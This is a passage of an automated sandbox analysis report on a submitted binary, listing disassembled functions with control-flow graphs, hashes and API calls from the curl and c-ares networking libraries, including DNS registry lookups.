                              • Opcode Fuzzy Hash: e0848b366a0e3d377b36fb231abd56286c32c098f95146bccb6b0d98a30192d6
                              • Instruction Fuzzy Hash: 58E1E4B4904309DFCB50EF68D9856AEBBF5AF45304F00886EE998DB350E7749998CF42
                              Function 001605B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1541 1605b0-1605b7 1542 1607ee 1541->1542 1543 1605bd-1605d4 1541->1543 1544 1607e7-1607ed 1543->1544 1545 1605da-1605e6 1543->1545 1544->1542 1545->1544 1546 1605ec-1605f0 1545->1546 1547 1605f6-160620 call 167350 call 1570b0 1546->1547 1548 1607c7-1607cc 1546->1548 1553 160622-160624 1547->1553 1554 16066a-16068c call 18dec0 1547->1554 1548->1544 1556 160630-160655 call 1570d0 call 1603c0 call 167450 1553->1556 1559 1607d6-1607e3 call 167380 1554->1559 1560 160692-1606a0 1554->1560 1580 1607ce 1556->1580 1581 16065b-160668 call 1570e0 1556->1581 1559->1544 1563 1606f4-1606f6 1560->1563 1564 1606a2-1606a4 1560->1564 1569 1607ef-16082b call 163000 1563->1569 1570 1606fc-1606fe 1563->1570 1567 1606b0-1606e4 call 1673b0 1564->1567 1567->1559 1586 1606ea-1606ee 1567->1586 1584 160831-160837 1569->1584 1585 160a2f-160a35 1569->1585 1571 16072c-160754 1570->1571 1576 160756-16075b 1571->1576 1577 16075f-16078b 1571->1577 1582 160707-160719 WSAEventSelect 1576->1582 1583 16075d 1576->1583 1598 160700-160703 1577->1598 1599 160791-160796 1577->1599 1580->1559 1581->1554 1581->1556 1582->1559 1590 16071f 1582->1590 1591 160723-160726 1583->1591 1593 160861-16087e 1584->1593 1594 160839-16084c call 166fa0 1584->1594 1587 160a37-160a3a 1585->1587 1588 160a3c-160a52 1585->1588 1586->1567 1595 1606f0 1586->1595 1587->1588 1588->1559 1596 160a58-160a81 call 162f10 1588->1596 1590->1591 1591->1569 1591->1571 1605 160882-16088d 1593->1605 1608 160852 1594->1608 1609 160a9c-160aa4 1594->1609 1595->1563 1596->1559 1612 160a87-160a97 call 166df0 1596->1612 1598->1582 1599->1598 1603 16079c-1607c2 call 1576a0 1599->1603 1603->1598 1610 160893-1608b1 1605->1610 1611 160970-160975 1605->1611 1608->1593 1614 160854-16085f 1608->1614 1609->1559 1615 1608c8-1608f7 1610->1615 1617 16097b-160989 call 1570b0 1611->1617 1618 160a19-160a2c 1611->1618 1612->1559 1614->1605 1625 1608fd-160925 1615->1625 1626 1608f9-1608fb 1615->1626 1617->1618 1624 16098f-16099e 1617->1624 1618->1585 1627 1609b0-1609c1 call 1570d0 1624->1627 1628 160928-16093f 1625->1628 1626->1628 1632 1609c3-1609c7 1627->1632 1633 1609a0-1609ae call 1570e0 1627->1633 1634 160945-16096b 1628->1634 1635 1608b3-1608c2 1628->1635 1637 1609e8-160a03 WSAEnumNetworkEvents 1632->1637 1633->1618 1633->1627 1634->1635 1635->1611 1635->1615 1639 160a05-160a17 1637->1639 1640 1609d0-1609e6 WSAEventSelect 1637->1640 1639->1640 1640->1633 1640->1637
                              APIs
                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00160712
                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001609DD
                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001609FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: EventSelect$EnumEventsNetwork
                              • String ID: multi.c
                              • API String ID: 2170980988-214371023
                              • Opcode ID: f3739dc284c8150eb7b38b81c9b5f4c80ef51976a9afb7101706a617de5eae5d
                              • Instruction ID: e4deb976859c1cb251088681a1319bfa0943854e11aa41d9ef1116c36785b06a
                              • Opcode Fuzzy Hash: f3739dc284c8150eb7b38b81c9b5f4c80ef51976a9afb7101706a617de5eae5d
                              • Instruction Fuzzy Hash: 8BD19E756083019FE712CF64CC81B6B77E9BF98348F04482CF99987282E774E968CB52
                              Function 0021B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1659 21b180-21b195 1660 21b3e0-21b3e7 1659->1660 1661 21b19b-21b1a2 1659->1661 1662 21b1b0-21b1b9 1661->1662 1662->1662 1663 21b1bb-21b1bd 1662->1663 1663->1660 1664 21b1c3-21b1d0 1663->1664 1666 21b1d6-21b1f2 1664->1666 1667 21b3db 1664->1667 1668 21b229-21b22d 1666->1668 1667->1660 1669 21b233-21b246 1668->1669 1670 21b3e8-21b417 1668->1670 1671 21b260-21b264 1669->1671 1672 21b248-21b24b 1669->1672 1677 21b582-21b589 1670->1677 1678 21b41d-21b429 1670->1678 1674 21b269-21b286 call 21af30 1671->1674 1675 21b215-21b223 1672->1675 1676 21b24d-21b256 1672->1676 1687 21b2f0-21b301 1674->1687 1688 21b288-21b2a3 call 21b060 1674->1688 1675->1668 1680 21b315-21b33c call 4d8b00 1675->1680 1676->1674 1682 21b435-21b44c call 21b590 1678->1682 1683 21b42b-21b433 call 21b590 1678->1683 1690 21b342-21b347 1680->1690 1691 21b3bf-21b3ca 1680->1691 1698 21b458-21b471 call 21b590 1682->1698 1699 21b44e-21b456 call 21b590 1682->1699 1683->1682 1687->1675 1708 21b307-21b310 1687->1708 1704 21b200-21b213 call 21b020 1688->1704 1705 21b2a9-21b2c7 getsockname call 21b020 1688->1705 1695 21b384-21b38f 1690->1695 1696 21b349-21b358 1690->1696 1700 21b3cc-21b3d9 1691->1700 1695->1691 1703 21b391-21b3a5 1695->1703 1702 21b360-21b382 1696->1702 1717 21b473-21b487 1698->1717 1718 21b48c-21b4a7 1698->1718 1699->1698 1700->1660 1702->1695 1702->1702 1709 21b3b0-21b3bd 1703->1709 1704->1675 1715 21b2cc-21b2dd 1705->1715 1708->1700 1709->1691 1709->1709 1715->1675 1721 21b2e3 1715->1721 1717->1677 1719 21b4b3-21b4cb call 21b660 1718->1719 1720 21b4a9-21b4b1 call 21b660 1718->1720 1726 21b4d9-21b4f5 call 21b660 1719->1726 1727 21b4cd-21b4d5 call 21b660 1719->1727 1720->1719 1721->1708 1732 21b4f7-21b50b 1726->1732 1733 21b50d-21b52b call 21b770 * 2 1726->1733 1727->1726 1732->1677 1733->1677 1738 21b52d-21b531 1733->1738 1739 21b580 1738->1739 1740 21b533-21b53b 1738->1740 1739->1677 1741 21b578-21b57e 1740->1741 1742 21b53d-21b547 1740->1742 1741->1677 1742->1741 1743 21b549-21b54d 1742->1743 1743->1741 1744 21b54f-21b558 1743->1744 1744->1741 1745 21b55a-21b576 call 21b870 * 2 1744->1745 1745->1677 1745->1741
                              APIs
                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0021B2B7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID: ares__sortaddrinfo.c$cur != NULL
                              • API String ID: 3358416759-2430778319
                              • Opcode ID: d649673243417f5040f7e6ff4b283ff0b22167315bf80be149d6688ff7014bb0
                              • Instruction ID: 1fee62c29653a3cee887206b01132cc56af0c9ea5f855bbb461659904ed375b9
                              • Opcode Fuzzy Hash: d649673243417f5040f7e6ff4b283ff0b22167315bf80be149d6688ff7014bb0
                              • Instruction Fuzzy Hash: C4C170716143059FD719DF24C890AAAB7F2FFA8344F44886CE8498B3A1D735EDA5CB81
                              Function 00166FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea8d73eef847a1bcdbb29f0e287da3fb6e526487db8fa1823853c71190f063af
                              • Instruction ID: 019b210cc4bdf6ab1ee1234903725a0ee897f0d9f4fbd2e4eb257a0f0e6ece95
                              • Opcode Fuzzy Hash: ea8d73eef847a1bcdbb29f0e287da3fb6e526487db8fa1823853c71190f063af
                              • Instruction Fuzzy Hash: E291133060D3094BD7358A29CC907BBB2D9FFC5368F148B2DE8A9432D4EB759C60D691
                              Function 0021A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                              Download Yara Rule
                              APIs
                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0020712E,?,?,?,00001001,00000000), ref: 0021A90C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: recvfrom
                              • String ID:
                              • API String ID: 846543921-0
                              • Opcode ID: daf188627fcd73b6d844d299c8a0f87a9ad51106b5127e6cfeaaeec1aa790941
                              • Instruction ID: 8bcc7f12d3740a6ba3f18f69b235356dff86f56faf7fc32ea89763171a4c993a
                              • Opcode Fuzzy Hash: daf188627fcd73b6d844d299c8a0f87a9ad51106b5127e6cfeaaeec1aa790941
                              • Instruction Fuzzy Hash: 3CF06D75119308AFD2209E01DC44DABBBEDEFC9764F05456DF948232118271AE50CAB2
                              Function 0020A440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0020AA19
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0020AA4C
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0020AA97
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0020AAE9
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0020AB30
                              • RegCloseKey.KERNELBASE(?), ref: 0020AB6A
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0020AB82
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0020AC46
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0020AD0A
                              • RegEnumKeyExA.KERNELBASE ref: 0020AD8D
                              • RegCloseKey.KERNELBASE(?), ref: 0020ADD9
                              • RegEnumKeyExA.KERNELBASE ref: 0020AE08
                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0020AE2A
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0020AE54
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0020AF63
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0020AFB2
                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0020B072
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: QueryValue$Open$CloseEnum
                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                              • API String ID: 4217438148-1047472027
                              • Opcode ID: 41dbf1d862c61a53b48e4b0037c3c9f80e46ff1317eb173321a216531bdcb598
                              • Instruction ID: f0999e5279d3d62164d3461a32f07fb7438130fd99132e3d1b0fce25d423bef6
                              • Opcode Fuzzy Hash: 41dbf1d862c61a53b48e4b0037c3c9f80e46ff1317eb173321a216531bdcb598
                              • Instruction Fuzzy Hash: 8D72C0B1624302AFE3209F24CC81B6BB7E8AF85700F545828F989D72D2E775E954CB53
                              Function 0018A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                              Download Yara Rule
                              APIs
                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0018A831
                              Strings
                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 0018ADAC
                              • @, xrefs: 0018A8F4
                              • Local Interface %s is ip %s using address family %i, xrefs: 0018AE60
                              • @, xrefs: 0018AC42
                              • Bind to local port %d failed, trying next, xrefs: 0018AFE5
                              • bind failed with errno %d: %s, xrefs: 0018B080
                              • Trying [%s]:%d..., xrefs: 0018A689
                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0018A6CE
                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 0018AE1F
                              • cf-socket.c, xrefs: 0018A5CD, 0018A735
                              • Could not set TCP_NODELAY: %s, xrefs: 0018A871
                              • cf_socket_open() -> %d, fd=%d, xrefs: 0018A796
                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0018AD0A
                              • Trying %s:%d..., xrefs: 0018A7C2, 0018A7DE
                              • Local port: %hu, xrefs: 0018AF28
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: setsockopt
                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                              • API String ID: 3981526788-2373386790
                              • Opcode ID: 5145663a07b36cc9fcdcb0c9e9007469c71a6d85ba25f41ca70b0612841e870a
                              • Instruction ID: 62b17afd986cd3585c4a0ef150b1172f70febda82c017a17b179c07aedbeb367
                              • Opcode Fuzzy Hash: 5145663a07b36cc9fcdcb0c9e9007469c71a6d85ba25f41ca70b0612841e870a
                              • Instruction Fuzzy Hash: B7621371508341ABE720DF24CC46BABB7E5BF91304F44492AF98897292E771EA45CF93
                              Function 00219740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 857 219740-21975b 858 219780-219782 857->858 859 21975d-219768 call 2178a0 857->859 861 219914-21994e call 4d8b70 RegOpenKeyExA 858->861 862 219788-2197a0 call 4d8e00 call 2178a0 858->862 866 2199bb-2199c0 859->866 867 21976e-219770 859->867 870 219950-219955 861->870 871 21995a-219992 RegQueryValueExA RegCloseKey call 4d8b98 861->871 862->866 873 2197a6-2197c5 862->873 874 219a0c-219a15 866->874 872 219772-21977e 867->872 867->873 870->874 885 219997-2199b5 call 2178a0 871->885 872->862 880 219827-219833 873->880 881 2197c7-2197e0 873->881 886 219835-21985c call 20e2b0 * 2 880->886 887 21985f-219872 call 215ca0 880->887 883 2197e2-2197f3 call 4d8b50 881->883 884 2197f6-219809 881->884 883->884 884->880 896 21980b-219810 884->896 885->866 885->873 886->887 897 2199f0 887->897 898 219878-21987d call 2177b0 887->898 896->880 902 219812-219822 896->902 901 2199f5-2199fb call 215d00 897->901 906 219882-219889 898->906 911 2199fe-219a09 901->911 902->874 906->901 910 21988f-21989b call 204fe0 906->910 910->897 916 2198a1-2198c3 call 4d8b50 call 2178a0 910->916 911->874 921 2199c2-2199ed call 20e2b0 * 2 916->921 922 2198c9-2198db call 20e2d0 916->922 921->897 922->921 926 2198e1-2198f0 call 20e2d0 922->926 926->921 932 2198f6-219905 call 2163f0 926->932 937 219f66-219f7f call 215d00 932->937 938 21990b-21990f 932->938 937->911 940 219a3f-219a5a call 216740 call 2163f0 938->940 940->937 946 219a60-219a6e call 216d60 940->946 949 219a70-219a94 call 216200 call 2167e0 call 216320 946->949 950 219a1f-219a39 call 216840 call 2163f0 946->950 961 219a16-219a19 949->961 962 219a96-219ac6 call 20d120 949->962 950->937 950->940 961->950 964 219fc1 961->964 967 219ae1-219af7 call 20d190 962->967 968 219ac8-219adb call 20d120 962->968 966 219fc5-219ffd call 215d00 call 20e2b0 * 2 964->966 966->911 967->950 975 219afd-219b09 call 204fe0 967->975 968->950 968->967 975->964 982 219b0f-219b29 call 20e730 975->982 987 219f84-219f88 982->987 988 219b2f-219b3a call 2178a0 982->988 989 219f95-219f99 987->989 988->987 994 219b40-219b54 call 20e760 988->994 991 219fa0-219fb6 call 20ebf0 * 2 989->991 992 219f9b-219f9e 989->992 1004 219fb7-219fbe 991->1004 992->964 992->991 1000 219f8a-219f92 994->1000 1001 219b5a-219b6e call 20e730 994->1001 1000->989 1007 219b70-21a004 1001->1007 1008 219b8c-219b97 call 2163f0 1001->1008 1004->964 1012 21a015-21a01d 1007->1012 1016 219c9a-219cab call 20ea00 1008->1016 1017 219b9d-219bbf call 216740 call 2163f0 1008->1017 1014 21a024-21a045 call 20ebf0 * 2 1012->1014 1015 21a01f-21a022 1012->1015 1014->966 1015->966 1015->1014 1025 219f31-219f35 1016->1025 1026 219cb1-219ccd call 20ea00 call 20e960 1016->1026 1017->1016 1034 219bc5-219bda call 216d60 1017->1034 1028 219f40-219f61 call 20ebf0 * 2 1025->1028 1029 219f37-219f3a 1025->1029 1045 219cfd-219d0e call 20e960 1026->1045 1046 219ccf 1026->1046 1028->950 1029->950 1029->1028 1034->1016 1044 219be0-219bf4 call 216200 call 2167e0 1034->1044 1044->1016 1065 219bfa-219c0b call 216320 1044->1065 1054 219d10 1045->1054 1055 219d53-219d55 1045->1055 1049 219cd1-219cec call 20e9f0 call 20e4a0 1046->1049 1066 219d47-219d51 1049->1066 1067 219cee-219cfb call 20e9d0 1049->1067 1060 219d12-219d2d call 20e9f0 call 20e4a0 1054->1060 1059 219e69-219e8e call 20ea40 call 20e440 1055->1059 1082 219e90-219e92 1059->1082 1083 219e94-219eaa call 20e3c0 1059->1083 1086 219d5a-219d6f call 20e960 1060->1086 1087 219d2f-219d3c call 20e9d0 1060->1087 1080 219c11-219c1c call 217b70 1065->1080 1081 219b75-219b86 call 20ea00 1065->1081 1071 219dca-219ddb call 20e960 1066->1071 1067->1045 1067->1049 1093 219ddd-219ddf 1071->1093 1094 219e2e-219e36 1071->1094 1080->1008 1098 219c22-219c33 call 20e960 1080->1098 1081->1008 1104 